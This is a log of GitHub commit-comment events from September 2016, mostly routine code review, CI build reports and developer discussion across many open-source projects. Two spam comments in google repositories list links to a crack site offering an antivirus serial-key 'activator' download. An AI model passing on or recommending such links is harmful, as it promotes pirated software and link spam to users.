{"id":"4523136868","type":"CommitCommentEvent","actor":{"login":"rflamino"},"repo":{"name":"rflamino/StellaBlue"},"payload":{"comment":{"id":18916347,"position":null,"line":null,"path":null,"commit_id":"d2c5a89a10a0b21d493ff9f53f88471e9d3b4f60","created_at":"2016-09-06T18:44:34Z","updated_at":"2016-09-06T18:44:34Z","body":"This version was submitted to fabrication!"}},"created_at":"2016-09-06T18:44:34Z"}
{"id":"4523138825","type":"CommitCommentEvent","actor":{"login":"kylemac"},"repo":{"name":"static-dev/spike-core"},"payload":{"comment":{"id":18916352,"position":5,"line":9,"path":"test/sugarml.js","commit_id":"e4621640dd8d0a9f1d610abe3c6f4f7f53b53f39","created_at":"2016-09-06T18:44:56Z","updated_at":"2016-09-06T18:44:56Z","body":"haven't we updated the extension? @jescalan "}},"created_at":"2016-09-06T18:44:56Z"}
{"id":"4523144796","type":"CommitCommentEvent","actor":{"login":"pantheondocs"},"repo":{"name":"pantheon-systems/documentation"},"payload":{"comment":{"id":18916369,"position":null,"line":null,"path":null,"commit_id":"29779ccf55658e1f51d79e6f5fe7ce72a54f1328","created_at":"2016-09-06T18:46:06Z","updated_at":"2016-09-06T18:46:06Z","body":"The following doc(s) have been deployed to the [slashzerop](https://slashzerop-static-docs.pantheonsite.io/docs) Multidev environment:\n- [docs/unsupported-modules-plugins](https://slashzerop-static-docs.pantheonsite.io/docs/unsupported-modules-plugins)\n- [docs/security](https://slashzerop-static-docs.pantheonsite.io/docs/security)\n- [source/docs/assets/images/auth-required.png](https://github.com/pantheon-systems/documentation/commit/29779ccf55658e1f51d79e6f5fe7ce72a54f1328/source/docs/assets/images/auth-required.png)\n- [source/docs/assets/images/environment-access.png](https://github.com/pantheon-systems/documentation/commit/29779ccf55658e1f51d79e6f5fe7ce72a54f1328/source/docs/assets/images/environment-access.png)\n- [source/docs/assets/images/lock-environment.png](https://github.com/pantheon-systems/documentation/commit/29779ccf55658e1f51d79e6f5fe7ce72a54f1328/source/docs/assets/images/lock-environment.png)\n"}},"created_at":"2016-09-06T18:46:06Z"}
{"id":"4523147605","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18916372,"position":null,"line":null,"path":null,"commit_id":"51c455dfba7bcbc70740fe5af88295896005561b","created_at":"2016-09-06T18:46:36Z","updated_at":"2016-09-06T18:46:36Z","body":"ASIHPValidation (shenb) - x86_64-MacOS-10.9-clang: OK (2324 of 2326 tests passed, 24 test warnings)\n\n * 5 tests had: EIO diffs.\n * 2 tests had: ESO big diffs.\n * 2 tests had: MTR big diffs.\n * 2 tests had: Table big diffs.\n * 25 tests had: AUD diffs.\n * 25 tests had: RDD diffs.\n * 15 tests had: ESO small diffs.\n * 13 tests had: MTR small diffs.\n * 1 test had: ERR diffs.\n * 1 test had: MTD diffs.\n * 1 test had: Table small diffs.\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-51c455dfba7bcbc70740fe5af88295896005561b-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-51c455dfba7bcbc70740fe5af88295896005561b-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.91%25-yellow.svg)</a> \n"}},"created_at":"2016-09-06T18:46:36Z"}
{"id":"4523154512","type":"CommitCommentEvent","actor":{"login":"angelosa"},"repo":{"name":"mamedev/mame"},"payload":{"comment":{"id":18916389,"position":null,"line":null,"path":null,"commit_id":"cde1fe2633c245132c9e572853e821880dd2be92","created_at":"2016-09-06T18:47:51Z","updated_at":"2016-09-06T18:47:51Z","body":"I've looked at it and no, it seemed right speed?\n\nThat's also how I've spotted that sound bug with Mayjinsen 3, by just AVI\nwriting it.\n\nAt this point there's no need to hide, if for whatever reason these games\ncrashes better to know it by external testing contributions than never\nknowing.\n\nOn Tue, Sep 6, 2016 at 8:33 PM, David Haywood <notifications@github.com>\nwrote:\n\n> are you sure?\n>\n> 11beat, even on an -aviwrite recording looks to be running at a lot less\n> than full speed\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/mamedev/mame/commit/cde1fe2633c245132c9e572853e821880dd2be92#commitcomment-18916189>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AI0px-RObPQYMm2vSlvb7Ho27fqPjVPXks5qnbHjgaJpZM4J2JMX>\n> .\n>\n"}},"created_at":"2016-09-06T18:47:51Z"}
{"id":"4523154809","type":"CommitCommentEvent","actor":{"login":"matthew-mcallister"},"repo":{"name":"ocf/utils"},"payload":{"comment":{"id":18916390,"position":null,"line":null,"path":null,"commit_id":"0e090cbf68416a11c54588d32af1e8baeabcd435","created_at":"2016-09-06T18:47:55Z","updated_at":"2016-09-06T18:47:55Z","body":"Good thinking."}},"created_at":"2016-09-06T18:47:55Z"}
{"id":"4523159690","type":"CommitCommentEvent","actor":{"login":"amandeep16"},"repo":{"name":"MichMich/MagicMirror"},"payload":{"comment":{"id":18916403,"position":null,"line":null,"path":null,"commit_id":"ae37fa2bc598301c69688c78a9adb0e270ad66ef","created_at":"2016-09-06T18:48:49Z","updated_at":"2016-09-06T18:48:49Z","body":"hi, still this issue is not resolved. Still sometimes current weather is showing 302...\r\n"}},"created_at":"2016-09-06T18:48:49Z"}
{"id":"4523165180","type":"CommitCommentEvent","actor":{"login":"DigiTec"},"repo":{"name":"w3c/webvr"},"payload":{"comment":{"id":18916409,"position":269,"line":459,"path":"index.bs","commit_id":"7a64a4f378409af4baf8db6ba6ed970f4e44d49c","created_at":"2016-09-06T18:49:48Z","updated_at":"2016-09-06T18:49:48Z","body":"So it can't be a frameid or sequence number then, it must be a 1ms resolution (at minimum). And should be clamped to 5us. We should ensure that all implementations obey this. Though technically the 5us thing may not matter since this timestamp is not under the control of the caller and can't be used for timing attacks the way performance.now was.  Here is the \"understandable\" description from MDN.\r\n\r\n> The DOMHighResTimeStamp type is a double and is used to store a time value. The value could be a discrete point in time or the difference in time between two discrete points in time. The unit is milliseconds and should be accurate to 5 µs (microseconds). However, if the browser is unable to provide a time value accurate to 5 microseconds (due, for example, to hardware or software constraints), the browser can represent the value as a time in milliseconds accurate to a millisecond."}},"created_at":"2016-09-06T18:49:48Z"}
{"id":"4523178450","type":"CommitCommentEvent","actor":{"login":"stefanpenner"},"repo":{"name":"tc39/proposal-cancelable-promises"},"payload":{"comment":{"id":18916446,"position":19,"line":121,"path":"Cancel Tokens.md","commit_id":"fcbedb0c12d3382173d35b4f677884c0ba46b62f","created_at":"2016-09-06T18:52:16Z","updated_at":"2016-09-06T18:52:16Z","body":"Ya race seems like a good fit here. We should also be careful that `race` does not leak like `Promise.race` here. For example, one could imagine one of these tokens quite long-lived, merely `following` it from a potentially short lived `race` should have the ability to release those resources."}},"created_at":"2016-09-06T18:52:16Z"}
{"id":"4523183846","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"garbas/mozilla-releng"},"payload":{"comment":{"id":18916461,"position":null,"line":null,"path":null,"commit_id":"aeb532173b31c4f92c07f22ba7f6954c48cf93a9","created_at":"2016-09-06T18:53:14Z","updated_at":"2016-09-06T18:53:14Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#D2UXNlL5QSqMIcxJ6PrijQ"}},"created_at":"2016-09-06T18:53:14Z"}
{"id":"4523186211","type":"CommitCommentEvent","actor":{"login":"jcmoore"},"repo":{"name":"anthonykoerber/strand"},"payload":{"comment":{"id":18916466,"position":16,"line":20,"path":"src/strand-grid-column/strand-grid-column.scss","commit_id":"4b1e02d6078a05f6e4a93a71af8cefd64da5dd2a","created_at":"2016-09-06T18:53:39Z","updated_at":"2016-09-06T18:53:39Z","body":"Assuming this is not also a WIP commit, did you intend to leave this here (and if so, should it be a `$color-*` variable instead)?"}},"created_at":"2016-09-06T18:53:39Z"}
{"id":"4523191568","type":"CommitCommentEvent","actor":{"login":"mamehaze"},"repo":{"name":"mamedev/mame"},"payload":{"comment":{"id":18916480,"position":null,"line":null,"path":null,"commit_id":"cde1fe2633c245132c9e572853e821880dd2be92","created_at":"2016-09-06T18:54:39Z","updated_at":"2016-09-06T18:54:39Z","body":"could just be me then, it can be difficult to judge with some of these games"}},"created_at":"2016-09-06T18:54:39Z"}
{"id":"4523199373","type":"CommitCommentEvent","actor":{"login":"djcarrol"},"repo":{"name":"djcarrol/DJCDemo2-1473187528415"},"payload":{"comment":{"id":18916511,"position":null,"line":null,"path":null,"commit_id":"2bd51d0b1b862661310f138e428109bb146f9ec6","created_at":"2016-09-06T18:56:06Z","updated_at":"2016-09-06T18:56:06Z","body":"Version 1"}},"created_at":"2016-09-06T18:56:06Z"}
{"id":"4523205351","type":"CommitCommentEvent","actor":{"login":"HWSKY"},"repo":{"name":"ppy/osu-web"},"payload":{"comment":{"id":18916529,"position":null,"line":null,"path":null,"commit_id":"faaf5b7d6a234538bc0626c5ca29e9d11f67df68","created_at":"2016-09-06T18:57:13Z","updated_at":"2016-09-06T18:57:13Z","body":"take this idea to the others files to the same case"}},"created_at":"2016-09-06T18:57:13Z"}
{"id":"4523205771","type":"CommitCommentEvent","actor":{"login":"Haxk20"},"repo":{"name":"silver13/h8mini-testing"},"payload":{"comment":{"id":18916533,"position":null,"line":null,"path":null,"commit_id":"d6363393b38ed5029911a9a3e2a1fc309cfe7088","created_at":"2016-09-06T18:57:17Z","updated_at":"2016-09-06T18:57:17Z","body":"So actually when i create app which will send command before MAC adress ?that should be possible somehow will take a look at android controlling bluetooth if i will be able to create that will tell you and am i actually right whit my theory ?\r\n"}},"created_at":"2016-09-06T18:57:17Z"}
{"id":"4523211679","type":"CommitCommentEvent","actor":{"login":"EugeneHasJeans"},"repo":{"name":"EugeneHasJeans/EugeneHasJeans.github.io"},"payload":{"comment":{"id":18916546,"position":null,"line":null,"path":null,"commit_id":"27288f17f070b5669cd7457d26aa247f6b610ed2","created_at":"2016-09-06T18:58:21Z","updated_at":"2016-09-06T18:58:21Z","body":"![20160906_145249](https://cloud.githubusercontent.com/assets/22033822/18286749/2c2fdf80-7442-11e6-9ba4-b23d1010d040.jpg)\r\n![20160906_145252](https://cloud.githubusercontent.com/assets/22033822/18286748/2c30a08c-7442-11e6-9d58-ff844724bba9.jpg)\r\n![20160906_145258_hdr](https://cloud.githubusercontent.com/assets/22033822/18286750/2c30f14a-7442-11e6-9171-ecaf8ad9d359.jpg)\r\n"}},"created_at":"2016-09-06T18:58:21Z"}
{"id":"4523214815","type":"CommitCommentEvent","actor":{"login":"olabini"},"repo":{"name":"twstrike/otrv4"},"payload":{"comment":{"id":18916560,"position":3,"line":3,"path":"otrv4.txt","commit_id":"661ff8897438ee22c9f39256ed615b1f3a32574b","created_at":"2016-09-06T18:58:54Z","updated_at":"2016-09-06T18:58:54Z","body":"What do you mean a standard definition for OTR? It stands for Off-The-Record"}},"created_at":"2016-09-06T18:58:54Z"}
{"id":"4523217475","type":"CommitCommentEvent","actor":{"login":"Fulgen301"},"repo":{"name":"Fulgen301/oc_hazard"},"payload":{"comment":{"id":18916568,"position":null,"line":null,"path":null,"commit_id":"6f9993c1ca4bd0eff7fa37506990e39e64a88ff6","created_at":"2016-09-06T18:59:24Z","updated_at":"2016-09-06T18:59:24Z","body":"Ok."}},"created_at":"2016-09-06T18:59:24Z"}
{"id":"4523219108","type":"CommitCommentEvent","actor":{"login":"aleventhal-aisquared"},"repo":{"name":"sholladay/build-files"},"payload":{"comment":{"id":18916570,"position":24,"line":24,"path":"index.js","commit_id":"d6b1997610238e29905f29047f1fc0c0784857be","created_at":"2016-09-06T18:59:42Z","updated_at":"2016-09-06T18:59:42Z","body":"Can't find docs for this option, here or in build-keys."}},"created_at":"2016-09-06T18:59:42Z"}
{"id":"4523221006","type":"CommitCommentEvent","actor":{"login":"azizurice"},"repo":{"name":"iMaruf/JavaBasicLearnning"},"payload":{"comment":{"id":18916573,"position":null,"line":null,"path":null,"commit_id":"41e0a832a34048b4328c9276fb1bd63ae93884e8","created_at":"2016-09-06T19:00:05Z","updated_at":"2016-09-06T19:00:05Z","body":"Maruf,\r\nWhen you will give/define variable name,method name and class name,don't use short name which does not reflect anything.  The standard is that you should choose a name which will reflect meaning; which can be understandable without your involvement.\r\n\r\nFor example,  in this program, you have used \r\n\r\nClass name: Task- what it means here and why did you choose the name Task?\r\nArray variable :  cards - why did you choose name cards?\r\nMethod name : pro - why did you choose this name? Does this name reflect what it does."}},"created_at":"2016-09-06T19:00:05Z"}
{"id":"4523222355","type":"CommitCommentEvent","actor":{"login":"olabini"},"repo":{"name":"twstrike/otrv4"},"payload":{"comment":{"id":18916577,"position":7,"line":7,"path":"otrv4.txt","commit_id":"661ff8897438ee22c9f39256ed615b1f3a32574b","created_at":"2016-09-06T19:00:21Z","updated_at":"2016-09-06T19:00:21Z","body":"Yes, we should definitely have a separate section on security properties in more formal language."}},"created_at":"2016-09-06T19:00:21Z"}
{"id":"4523225722","type":"CommitCommentEvent","actor":{"login":"alexahn917"},"repo":{"name":"Sparen/Summer2016_Network"},"payload":{"comment":{"id":18916589,"position":null,"line":null,"path":null,"commit_id":"da4466fdf5054ade98d33b5c17e15a4f2d7d996a","created_at":"2016-09-06T19:00:53Z","updated_at":"2016-09-06T19:00:53Z","body":"I have. Partially.\nThe problem is that curves arent drawn in phase 3 for some reason\n\n2016. 9. 6. 오후 2:28에 \"Andrew Fan\" <notifications@github.com>님이 작성:\n\n> Please resolve in Phase 3\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/Sparen/Summer2016_Network/commit/da4466fdf5054ade98d33b5c17e15a4f2d7d996a#commitcomment-18916139>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AP0Fe84-mUDYqCRPko9OmtIHNpIzHT48ks5qnbDpgaJpZM4J2I8e>\n> .\n>\n"}},"created_at":"2016-09-06T19:00:53Z"}
{"id":"4523237218","type":"CommitCommentEvent","actor":{"login":"davidben"},"repo":{"name":"ekr/tls13-spec"},"payload":{"comment":{"id":18916624,"position":35,"line":1417,"path":"draft-ietf-tls-tls13.md","commit_id":"ccd727718bd9b897b39472accb82367d28934e5f","created_at":"2016-09-06T19:03:03Z","updated_at":"2016-09-06T19:03:03Z","body":"suported_versions => supported_versions"}},"created_at":"2016-09-06T19:03:03Z"}
{"id":"4523237379","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18916626,"position":null,"line":null,"path":null,"commit_id":"95ddbbe3fcde87eb2285a3afbacd95be1ba51058","created_at":"2016-09-06T19:03:05Z","updated_at":"2016-09-06T19:03:05Z","body":"113835705-Low-Temp-Radiant-Variable-Flow-Autosize-Issue (RKStrand) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: OK (1761 of 1762 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-95ddbbe3fcde87eb2285a3afbacd95be1ba51058-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-95ddbbe3fcde87eb2285a3afbacd95be1ba51058-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.94%25-yellow.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-95ddbbe3fcde87eb2285a3afbacd95be1ba51058-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-70.91%25-green.svg)</a>\n"}},"created_at":"2016-09-06T19:03:05Z"}
{"id":"4523246069","type":"CommitCommentEvent","actor":{"login":"rodgert"},"repo":{"name":"zeromq/azmq"},"payload":{"comment":{"id":18916649,"position":null,"line":null,"path":null,"commit_id":"c23221bd572ee3034287d69940cfb102296e5d9a","created_at":"2016-09-06T19:04:43Z","updated_at":"2016-09-06T19:04:43Z","body":"TeamCity Azmq :: Build (Windows) [Build 192](https://136.243.151.173:4433/viewLog.html?buildId=785&buildTypeId=Azmq_Build&guest=1) is now running\n"}},"created_at":"2016-09-06T19:04:43Z"}
{"id":"4523250019","type":"CommitCommentEvent","actor":{"login":"johandc"},"repo":{"name":"pacheco017/libcsp"},"payload":{"comment":{"id":18916658,"position":null,"line":null,"path":null,"commit_id":"66122264332739d42577d2587faf57d88f40c8e5","created_at":"2016-09-06T19:05:29Z","updated_at":"2016-09-06T19:05:29Z","body":"Thank you for the notification. Is this really the only occurrence?"}},"created_at":"2016-09-06T19:05:29Z"}
{"id":"4523251330","type":"CommitCommentEvent","actor":{"login":"k2soule"},"repo":{"name":"isaw-ga-3024/isaw-ga-3024.github.io"},"payload":{"comment":{"id":18916664,"position":null,"line":null,"path":null,"commit_id":"9072c96f8158739665322205a29cabde013eba9d","created_at":"2016-09-06T19:05:45Z","updated_at":"2016-09-06T19:05:45Z","body":"Testing 123 ..."}},"created_at":"2016-09-06T19:05:45Z"}
{"id":"4523253268","type":"CommitCommentEvent","actor":{"login":"olabini"},"repo":{"name":"twstrike/otrv4"},"payload":{"comment":{"id":18916671,"position":2,"line":1,"path":"otrv4.md","commit_id":"b55733bad235ba5d710fa0009391ce7c22380d20","created_at":"2016-09-06T19:06:08Z","updated_at":"2016-09-06T19:06:08Z","body":"You don't really need the ending hash marks."}},"created_at":"2016-09-06T19:06:08Z"}
{"id":"4523253762","type":"CommitCommentEvent","actor":{"login":"rodgert"},"repo":{"name":"zeromq/azmq"},"payload":{"comment":{"id":18916673,"position":null,"line":null,"path":null,"commit_id":"c23221bd572ee3034287d69940cfb102296e5d9a","created_at":"2016-09-06T19:06:13Z","updated_at":"2016-09-06T19:06:13Z","body":"TeamCity Azmq :: Build (Windows) [Build 192](https://136.243.151.173:4433/viewLog.html?buildId=785&buildTypeId=Azmq_Build&guest=1) outcome was **SUCCESS**\nSummary: Tests passed: 30 Build time: 00:01:30"}},"created_at":"2016-09-06T19:06:13Z"}
{"id":"4523253763","type":"CommitCommentEvent","actor":{"login":"rodgert"},"repo":{"name":"zeromq/azmq"},"payload":{"comment":{"id":18916674,"position":null,"line":null,"path":null,"commit_id":"51e3350b87bd96e3ba4d93b00faa7d00831b6e33","created_at":"2016-09-06T19:06:13Z","updated_at":"2016-09-06T19:06:13Z","body":"TeamCity Azmq :: Build (Windows) [Build 193](https://136.243.151.173:4433/viewLog.html?buildId=786&buildTypeId=Azmq_Build&guest=1) is now running\n"}},"created_at":"2016-09-06T19:06:13Z"}
{"id":"4523254980","type":"CommitCommentEvent","actor":{"login":"arahsafari"},"repo":{"name":"arahsafari/ASD_Task_1"},"payload":{"comment":{"id":18916680,"position":null,"line":null,"path":null,"commit_id":"5ba2064b6607b020c9d0cfdf9bd3eabdef32291d","created_at":"2016-09-06T19:06:27Z","updated_at":"2016-09-06T19:06:27Z","body":"s"}},"created_at":"2016-09-06T19:06:27Z"}
{"id":"4523255100","type":"CommitCommentEvent","actor":{"login":"tpgxyz"},"repo":{"name":"OpenMandrivaAssociation/libgcrypt"},"payload":{"comment":{"id":18916681,"position":null,"line":null,"path":null,"commit_id":"de740aa387a383e803a7040a2508ab63a72900df","created_at":"2016-09-06T19:06:29Z","updated_at":"2016-09-06T19:06:29Z","body":"@berolinux Looks like this does not work...\r\nhttps://abf.openmandriva.org/build_lists/79048\r\nin build logs exec stack is still missing\r\n"}},"created_at":"2016-09-06T19:06:29Z"}
{"id":"4523256731","type":"CommitCommentEvent","actor":{"login":"mbillow"},"repo":{"name":"ComputerScienceHouse/conditional"},"payload":{"comment":{"id":18916689,"position":null,"line":null,"path":null,"commit_id":"21561f33e14018b7081e91f5d84ff65c8797909e","created_at":"2016-09-06T19:06:48Z","updated_at":"2016-09-06T19:06:48Z","body":"Stop disabling linters! If you want to change the settings, we can have a conversation about that. But disabling the checks doesn't help us in any way."}},"created_at":"2016-09-06T19:06:48Z"}
{"id":"4523258988","type":"CommitCommentEvent","actor":{"login":"rodgert"},"repo":{"name":"zeromq/azmq"},"payload":{"comment":{"id":18916694,"position":null,"line":null,"path":null,"commit_id":"51e3350b87bd96e3ba4d93b00faa7d00831b6e33","created_at":"2016-09-06T19:07:15Z","updated_at":"2016-09-06T19:07:15Z","body":"TeamCity Azmq :: Build (Windows) [Build 193](https://136.243.151.173:4433/viewLog.html?buildId=786&buildTypeId=Azmq_Build&guest=1) outcome was **FAILURE**\nSummary: Tests passed: 18; exit code 8 (new); failed to parse xml report (new) Build time: 00:01:02"}},"created_at":"2016-09-06T19:07:15Z"}
{"id":"4523259586","type":"CommitCommentEvent","actor":{"login":"goatslacker"},"repo":{"name":"goatslacker/alt"},"payload":{"comment":{"id":18916696,"position":null,"line":null,"path":null,"commit_id":"5b41cadc33b425c53c925de4cb0dafefe7a20982","created_at":"2016-09-06T19:07:22Z","updated_at":"2016-09-06T19:07:22Z","body":"+1"}},"created_at":"2016-09-06T19:07:22Z"}
{"id":"4523261368","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18916698,"position":null,"line":null,"path":null,"commit_id":"1ce1a5106c9f0fbe1ffe4849879a35a3f3a2f9cf","created_at":"2016-09-06T19:07:42Z","updated_at":"2016-09-06T19:07:42Z","body":"#5770-User-file-generating-many-fancoil-max-iteration-warnings (mjwitte) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-1ce1a5106c9f0fbe1ffe4849879a35a3f3a2f9cf-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a>  \n"}},"created_at":"2016-09-06T19:07:42Z"}
{"id":"4523264041","type":"CommitCommentEvent","actor":{"login":"davidben"},"repo":{"name":"ekr/tls13-spec"},"payload":{"comment":{"id":18916703,"position":6,"line":1721,"path":"draft-ietf-tls-tls13.md","commit_id":"b43a09735f2dbd5660374b1890fda705a5538974","created_at":"2016-09-06T19:08:15Z","updated_at":"2016-09-06T19:08:15Z","body":"Probably want to explicitly call out:\r\n\r\n\"Note that this means a ClientHello which advertises {3, 5} in ClientHello.legacy_version with no \"supported_versions\" extension is treated as advertising TLS 1.2.\""}},"created_at":"2016-09-06T19:08:15Z"}
{"id":"4523266933","type":"CommitCommentEvent","actor":{"login":"davidben"},"repo":{"name":"ekr/tls13-spec"},"payload":{"comment":{"id":18916710,"position":2,"line":1718,"path":"draft-ietf-tls-tls13.md","commit_id":"b43a09735f2dbd5660374b1890fda705a5538974","created_at":"2016-09-06T19:08:47Z","updated_at":"2016-09-06T19:08:47Z","body":"Maybe add \", if present,\" after \"\\\"supported_versions\\\" extension\"."}},"created_at":"2016-09-06T19:08:47Z"}
{"id":"4523270032","type":"CommitCommentEvent","actor":{"login":"XFuryMCPE"},"repo":{"name":"iTXTech/Genisys"},"payload":{"comment":{"id":18916721,"position":null,"line":null,"path":null,"commit_id":"e57a7e7bafdcd74e7962b59f5ac2e889e05787e5","created_at":"2016-09-06T19:09:25Z","updated_at":"2016-09-06T19:09:25Z","body":"SHOGHI?"}},"created_at":"2016-09-06T19:09:25Z"}
{"id":"4523270648","type":"CommitCommentEvent","actor":{"login":"danishali007"},"repo":{"name":"google/lovefield"},"payload":{"comment":{"id":18916722,"position":null,"line":null,"path":null,"commit_id":"741cef2e35ccdaa0b27b03edfed883e7e78c0f18","created_at":"2016-09-06T19:09:33Z","updated_at":"2016-09-06T19:09:33Z","body":"http://www.cracks9.com\r\nhttp://www.cracks9.com/eset-nod32-anitivirus-9-serial-keys-crack-activator-free-download/\r\nhttp://www.cracks9.com/c/antivirus\r\nhttp://www.urdupoetry4u.com/2016/09/top-20-sad-quotes-by-shakespeare.html\r\nhttp://www.urdupoetry4u.com/2016/08/status-for-whatsapp-in-english.html\r\nhttp://www.urdupoetry4u.com/2016/07/funny-whatsapp-status.html\r\nhttp://www.urdupoetry4u.com/2016/07/top-10-love-poems-love-poems-for-her.html"}},"created_at":"2016-09-06T19:09:33Z"}
{"id":"4523272632","type":"CommitCommentEvent","actor":{"login":"MichMich"},"repo":{"name":"MichMich/MagicMirror"},"payload":{"comment":{"id":18916723,"position":null,"line":null,"path":null,"commit_id":"ae37fa2bc598301c69688c78a9adb0e270ad66ef","created_at":"2016-09-06T19:09:54Z","updated_at":"2016-09-06T19:09:54Z","body":"Please check the feed. It might be an issue with the openweathermap api. "}},"created_at":"2016-09-06T19:09:54Z"}
{"id":"4523273767","type":"CommitCommentEvent","actor":{"login":"jachym"},"repo":{"name":"geopython/pywps"},"payload":{"comment":{"id":18916727,"position":null,"line":null,"path":null,"commit_id":"4a35a4942f1427faee482abed4b5658a9f549c05","created_at":"2016-09-06T19:10:08Z","updated_at":"2016-09-06T19:10:08Z","body":"Tom,\r\n\r\nI'm aware of, we had such discussion, but during my work on https://github.com/geopython/pywps-demo/pull/23 I've introduced VERSION.txt file, which should have the same version as PyWPS(-core) has -and I had to add pywps dep to requirements and setup.py\r\n\r\nWhen I was using pywps-4.0.0-rc1 dependency, it was not found, since python (setup.py) converted it to pywps-4.0.0rc1 - installation ended up with error (and so did documentation build on readthedocs)\r\n\r\nI've checked https://www.python.org/dev/peps/pep-0440/#pre-releases where it explicitelly states:\r\n\r\n```\r\n X.YrcN  # Release Candidate\r\n```\r\n\r\ntherefore, I went for it and the build worked well afterwards"}},"created_at":"2016-09-06T19:10:08Z"}
{"id":"4523277043","type":"CommitCommentEvent","actor":{"login":"thomasjiji"},"repo":{"name":"thomasjiji/first-program"},"payload":{"comment":{"id":18916734,"position":3,"line":2,"path":"README.md","commit_id":"6394e216944fd538db982a843d2a883460e09b18","created_at":"2016-09-06T19:10:41Z","updated_at":"2016-09-06T19:10:41Z","body":"thats good"}},"created_at":"2016-09-06T19:10:41Z"}
{"id":"4523282260","type":"CommitCommentEvent","actor":{"login":"vicentemcarvalho"},"repo":{"name":"FelipeNunes04/HDetector"},"payload":{"comment":{"id":18916746,"position":null,"line":null,"path":null,"commit_id":"bd028db0de77cf7ffc38417997ffc4a97f4e5209","created_at":"2016-09-06T19:11:38Z","updated_at":"2016-09-06T19:11:38Z","body":"Sloeber project."}},"created_at":"2016-09-06T19:11:38Z"}
{"id":"4523286052","type":"CommitCommentEvent","actor":{"login":"jescalan"},"repo":{"name":"static-dev/spike-core"},"payload":{"comment":{"id":18916760,"position":5,"line":9,"path":"test/sugarml.js","commit_id":"e4621640dd8d0a9f1d610abe3c6f4f7f53b53f39","created_at":"2016-09-06T19:12:22Z","updated_at":"2016-09-06T19:12:22Z","body":"yeah, good call. the old extension still works fine, but i'll switch this anyway!"}},"created_at":"2016-09-06T19:12:22Z"}
{"id":"4523292222","type":"CommitCommentEvent","actor":{"login":"rodgert"},"repo":{"name":"zeromq/azmq"},"payload":{"comment":{"id":18916794,"position":null,"line":null,"path":null,"commit_id":"c23221bd572ee3034287d69940cfb102296e5d9a","created_at":"2016-09-06T19:13:32Z","updated_at":"2016-09-06T19:13:32Z","body":"TeamCity Azmq :: Build (Windows) [Build 194](https://136.243.151.173:4433/viewLog.html?buildId=787&buildTypeId=Azmq_Build&guest=1) is now running\n"}},"created_at":"2016-09-06T19:13:32Z"}
{"id":"4523293713","type":"CommitCommentEvent","actor":{"login":"danishali007"},"repo":{"name":"google/acme"},"payload":{"comment":{"id":18916804,"position":null,"line":null,"path":null,"commit_id":"12aaa64a6ea8255b5a3ab50c202fb578ab8d1368","created_at":"2016-09-06T19:13:50Z","updated_at":"2016-09-06T19:13:50Z","body":"http://www.cracks9.com\r\nhttp://www.cracks9.com/eset-nod32-anitivirus-9-serial-keys-crack-activator-free-download/\r\nhttp://www.cracks9.com/c/antivirus\r\nhttp://www.urdupoetry4u.com/2016/09/top-20-sad-quotes-by-shakespeare.html\r\nhttp://www.urdupoetry4u.com/2016/08/status-for-whatsapp-in-english.html\r\nhttp://www.urdupoetry4u.com/2016/07/funny-whatsapp-status.html\r\nhttp://www.urdupoetry4u.com/2016/07/top-10-love-poems-love-poems-for-her.html"}},"created_at":"2016-09-06T19:13:50Z"}
{"id":"4523294640","type":"CommitCommentEvent","actor":{"login":"mwojcikowski"},"repo":{"name":"richlewis42/scikit-chem"},"payload":{"comment":{"id":18916805,"position":35,"line":35,"path":"skchem/standardizers/native.py","commit_id":"6ee580eca2672070f77d5c937ad4ff3ed40e7c2b","created_at":"2016-09-06T19:14:00Z","updated_at":"2016-09-06T19:14:00Z","body":"Should we use generators here for lazy pipeline evaluation?"}},"created_at":"2016-09-06T19:14:00Z"}
{"id":"4523298964","type":"CommitCommentEvent","actor":{"login":"rodgert"},"repo":{"name":"zeromq/azmq"},"payload":{"comment":{"id":18916816,"position":null,"line":null,"path":null,"commit_id":"c23221bd572ee3034287d69940cfb102296e5d9a","created_at":"2016-09-06T19:14:47Z","updated_at":"2016-09-06T19:14:47Z","body":"TeamCity Azmq :: Build (Windows) [Build 194](https://136.243.151.173:4433/viewLog.html?buildId=787&buildTypeId=Azmq_Build&guest=1) outcome was **SUCCESS**\nSummary: Tests passed: 30 Build time: 00:01:15"}},"created_at":"2016-09-06T19:14:47Z"}
